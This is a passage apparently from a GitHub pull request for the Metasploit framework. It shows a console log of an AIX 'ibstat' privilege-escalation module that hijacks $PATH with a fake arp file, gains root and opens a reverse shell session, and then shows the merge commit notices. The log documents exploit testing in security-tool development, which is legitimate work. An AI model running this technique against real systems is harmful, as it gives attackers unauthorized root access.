LHOST => [redacted]
msf exploit(ibstat_path) > exploit

[*] Started reverse handler on [redacted]:4444
[+] Target is vulnerable.
[*] Checking if gcc exists...
[*] gcc not found. Using /bin/sh from local system
[*] Writing custom arp file...
[*] Custom arp file written
[*] Updating $PATH environment variable...
[*] Triggering vulnerablity...
[*] Restoring $PATH environment variable...
[*] Checking root privileges...
[+] Got root! (euid)
[*] Executing payload...
[*] Command shell session 2 opened ([redacted]:4444 -> [redacted]:49066) at 2014-03-27 16:55:23 -0500
[+] Deleted /tmp/arp

4168838728
zPtIPyitHSaNrodrCcKIcmNnSQWACFAM
gRZjBzhdwkFsBsOAtvOHuQkKZyhdSWtB
id
uid=20013521([redacted]) gid=1(staff) euid=0(root)
uname -a
AIX l273pp056_pub 1 7 00F602734C00
@wvu-r7 wvu-r7 added a commit that referenced this pull request Apr 3, 2014
@wvu-r7 wvu-r7 Land #3046, AIX ibtstat privesc exploit 48ef061
@wvu-r7 wvu-r7 merged commit 8611526 into rapid7:master Apr 3, 2014

1 check passed

Details default The Travis CI build passed
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Something went wrong with that request. Please try again.